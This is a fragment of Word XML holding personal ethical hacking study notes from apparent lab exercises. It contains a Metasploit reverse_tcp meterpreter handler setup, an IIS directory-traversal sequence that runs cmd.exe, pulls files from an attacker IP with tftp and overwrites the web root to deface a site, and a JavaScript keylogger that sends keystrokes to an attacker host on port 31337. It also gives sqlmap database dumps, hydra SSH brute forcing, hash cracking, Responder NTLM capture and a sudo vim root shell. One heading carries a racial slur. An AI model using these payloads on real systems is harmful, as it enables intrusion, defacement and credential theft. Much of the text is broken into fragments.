    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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lport 7777</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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Make note of the resource file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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lhost &lt;Kali IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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lport 7777</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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Reboot Server2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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Log in as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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Verify that the handler receives a connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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At the meterpreter prompt type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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getuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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When done, at meterpreter prompt&gt; enter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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&lt;full path to resource file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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Make note of the name of the remaining artifact in C:\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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Manually delete the final artifact in C:\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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DEFACING A WEBSITE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir+c:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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http://192.168.252.155/scripts/..//../winnt/system32/cmd.exe?/c+dir+c:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/ping.exe?+192.168.252.152</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/arp.exe?+-a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/tftp.exe?+192.168.252.152+get+default.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/tftp.exe?+-i+192.168.252.152+get+virus.gif</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:\inetpub\scripts\default.htm+c:\inetpub\wwwroot\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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http://192.168.252.155/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:\inetpub\scripts\virus.gif+c:\inetpub\wwwroot\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2D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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D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2E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&lt;h1&gt;A web page served by netcat!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E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&lt;form id="login-form"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E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&lt;input type="text" name="username" id="username-field" class="login-form-field" placeholder="Username"&gt;</w:t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&lt;input type="password" name="password" id="password-field" class="login-form-field" placeholder="Password"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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&lt;input type="submit" value="Login" id="login-form-submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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var attacker = 'http://192.168.6.128:31337/?key=';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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document.onkeypress = function (payload) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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new Image().src = attacker + payload.key;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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2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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F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CEH - [x] Footprinting - [x] Scanning - [x] Enumeration - [x] Vulnerability Analysis - [x] System Hacking ** Gaining Access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - [x] Cracking passwords - [x] Vulnerability Exploitation </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalating Privileges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Maintaining Access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - [x] Executing Applications - [x] Hiding Files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clearing Logs ** - [x] Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F1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kix.5wym01ydx330" w:id="1"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Online Resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="480"/>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="4f81bd"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ethical hacking labs writeup - git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.c3su9ttmsngo" w:id="2"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.pcjjzzi45j6k" w:id="3"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">host enumation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F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host and service enumeration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//discover devices inside the network eth0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netdiscover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eth0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10.10.10.0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enumeration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netstat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10.10.10.10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netstat enumeration netbios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snmp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10.10.10.10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extract users from netbios - parrot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enum4linux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10.10.10.10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nmap_scan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www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scanme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scan IPV6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T5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nmap_scan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[prefer] fast scan ufo mode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nmap_scan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UDP/TCP scanning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nmap_scan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nmap_scan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 nmap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AllPorts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p22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openports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../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scan mi net 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161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UDP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retries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optimize scan time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&lt;&lt;&lt;&lt;&lt;&lt;&lt;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oX test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10.10.10.0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Scanning the network and subnet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ARP ping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UDP ping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=======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oX test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/24 // scanning network subnet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//scripts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snmp //extract users of the network port 161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-PR = ARP ping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-PE = ICMP scan echo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-PU = UDP ping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-oX = save XMl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&gt;&gt;&gt;&gt;&gt;&gt;&gt; df364a4f409faf7bc6bb4b291db58d3dcabb2bb9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-vv = verbose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-p = ports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-sC = default scripts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-A = agressive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-oN = save in a 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-sS = syn scan is untrusive because don't complete the petitions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-n = no resolution of dns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-p- = all ports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-sV = Probe open ports to determine service/version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Timing scanning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output to save the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TCP port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UDP port scan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Agressive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OS detection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ports open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save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grep format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ping to the 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dont resolve domain names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retries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verify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verifica el sistema operativo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My niggerian methodology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nmap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#top1000ports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masscan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tun0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65535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udp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ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.5s4gk6mlw6us" w:id="4"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">default ports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F9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3306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mysql –script mysql-info mysql-enum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3389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rdp port remote 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smtp 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https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telnet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imap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36" w:before="36" w:lineRule="auto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</w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.x1s04uftnkar" w:id="5"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Enumeration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dir enumeration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gobuster dir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wordlists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dirb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php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txt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directory listing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wordlists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threads int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concurrent </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="06287e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enumerate hidden files htm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–quiet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Don’t print the banner and other noise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wordpress enumeration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wpscan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url https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//localchost.com --passwords=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wpscan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 vp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wpscan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wordlist path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rockyou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//bruteforce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enumerate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enumerate usernames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vulnerable plugins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wordlist generation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cewl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wordlist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http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//wordpress.com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deeph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scanning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long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save to a file worlist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.keuk04iiqcpl" w:id="6"/>
    <w:bookmarkEnd w:id="6"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000311">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web explotation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sql injection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sqlmap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http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//10.10.197.40/administrator.php --forms --dump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url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grab the forms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detect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dump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retrieve data form de sqli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#### basic sqli injection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sqlmap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10.10.77.169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dump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url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check the forms automatically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dump dthe database data entries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extract database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sqlmap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http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//localchost.com/hey.php?artist=1 --dbs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extract colums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Sqlmap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http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//localchost.com/hey.php?artist=1 --D (tabla) --T artists --columns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extract data of the table and the column inside of the db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sqlmap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 http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//localchost.com/hey.php?artist=1 --D (tabla) --T artist --C adesc, aname, artist_id --dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.elfpv87egb50" w:id="7"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000313">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr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enum4linux 10.10.60.11</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.y1g9k2w4y3ru" w:id="8"/>
    <w:bookmarkEnd w:id="8"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000315">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bruteforcing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-t4 -l lin -P /usr/share/wordlists/rockyou.txt ssh:10.10.149.11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-l lin -P /usr/share/wordlists/rockyou.txt ssh:10.10.149.118</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.a8lvv4rnll1w" w:id="9"/>
    <w:bookmarkEnd w:id="9"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000317">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stego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exiftool cats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zsteg cats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binwalk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cats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png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windows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snow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"magic"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readme2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passowrd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//image steganography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openstego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extract dat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//stegseek to crack stego password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.8z1iitm5nicl" w:id="10"/>
    <w:bookmarkEnd w:id="10"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000319">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows rpc mal configurado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rpcclient 10.10.123.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.awmrfe27ib1f" w:id="11"/>
    <w:bookmarkEnd w:id="11"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcracking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031C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hashcat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hashcat -O -w3 -m 0 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt --show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-m = type of hash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-a = attack mode (1-3) 3 bruteforcing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--show = mostrar hash crackeado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hashcat -O -A 0 -m 20 salt12314124:passowrdmd523432 /usr/share/worlist/rockyou.txt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hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show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--format=Raw-MD5 hash --wordlist=/usr/share/wordlists/rockyou.txt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 --format = hash format '--list=formats | grep MD5'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 hash = file - echo '123213dasd' &gt;&gt; hash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 wordlist= = wordlist to crack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### to show the hash cracked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--show --format=Raw-MD5 hash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 --show = show the hash:Cracked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//HashCalc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 a file and open into hashcalc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will give you the the hash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md5 or other algorithms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MD5 calculator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will compare both files what we need get the md5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HashMyFiles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allow you to hash all the files inside a folder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Veracrypt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rainbowtables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Rainbowtables are already hash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password to perform cracking without calculate a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hash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linux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rtgen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rainbowcrack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rtgen sha256 loweralpha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numeric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generate a new rainbow table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windows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rtgen md5 loweralpha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hnumeric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use app rainbowcrack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add the hashes and the rainbow table option</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.ifqzv2iy1h32" w:id="12"/>
    <w:bookmarkEnd w:id="12"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000324">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enumerating -samba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search for commands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smbmap --help | grep -i username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smbmap -u "admin" -p "passowrd" -H 10.10.10.10 -x "ipconfig"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-x = command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.4m7krqeksg3h" w:id="13"/>
    <w:bookmarkEnd w:id="13"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000326">
      <w:pPr>
        <w:pStyle w:val="Heading3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### wireshark filters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filters by post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smtp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email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pop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email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qry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fields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qry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show records present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pcap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flags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are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unique DNS queries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tcp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show tcp packets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//find packets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find packets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packet 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packet bytes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sensitive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strings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search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//DDOS ATTACK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look number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packets first column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statistics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ipv4 statistics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destination and ports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/// tshark cli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tshark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//count how many packets are in a capture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tshark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"dns.qry.type == 1"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fields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qry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//show records present in this pcap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tshark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dnsexfil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pcap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"dns.flags.response == 0"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tshark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pcap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fields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dns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qry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uniq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//There are 56 unique DNS queries.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tshark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pcap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n2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//DNS server side to identify 'special' queries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tshark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pcap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"dns.flags.response == 0"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fields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"dns.qry.name"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sed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"s/.m4lwhere.org//g"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`exfiltrate data with regx`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.aojhlbecim7z" w:id="14"/>
    <w:bookmarkEnd w:id="14"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000328">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege scalation reverse shell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ssh -p 2222 mith@10.10.123.23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-ls ###list de su permisions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sudo vim -c ':!/bin/sh' ### privilege scalation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https://gtfobins.github.io/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.jm4twt128zf4" w:id="15"/>
    <w:bookmarkEnd w:id="15"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032B">
      <w:pPr>
        <w:pStyle w:val="Heading4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passwords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ftp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usernames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pass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mysql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hashcat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exe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hash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rokyou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p443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135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sV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T4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nmapOutput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0.10.10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wpscan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url https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//10.10.10.10 --enumerate u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netdiscover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eth0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raw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md5 password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 To change password to plain text ]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.oi64fl9lm9fz" w:id="16"/>
    <w:bookmarkEnd w:id="16"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability scanning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nikto -h url -Cgidirs all</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.h16slg2rp4sx" w:id="17"/>
    <w:bookmarkEnd w:id="17"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System hacking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1 - on a windows machine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wmic useraccount get name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//list users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using a tool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Pwdump7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exe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/path/file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//get a file to crack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using ophcrack to crack the hash with rainbow tables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ophcrack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tables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vista free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cracking with rainbow tables using winrtgen to create a rainbow table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winrtgen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 table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hashntlm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rainbowcrack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select the obtained file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select dircreatd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winrtgen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2 - using responder to capture the traffic of the windows system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//run a shared folder on windows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//capture the ntlm hash &gt;&gt; cracking with jhon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responder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Responder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eth0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//ifconfig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cracking the ntlm capture with ntlm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capture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txt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lopthcr4ck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helps to crack ntlm passwords store on windows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system hacking windows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look for an exploit and try to get remote access to the victim using msfvnom,metasploit and 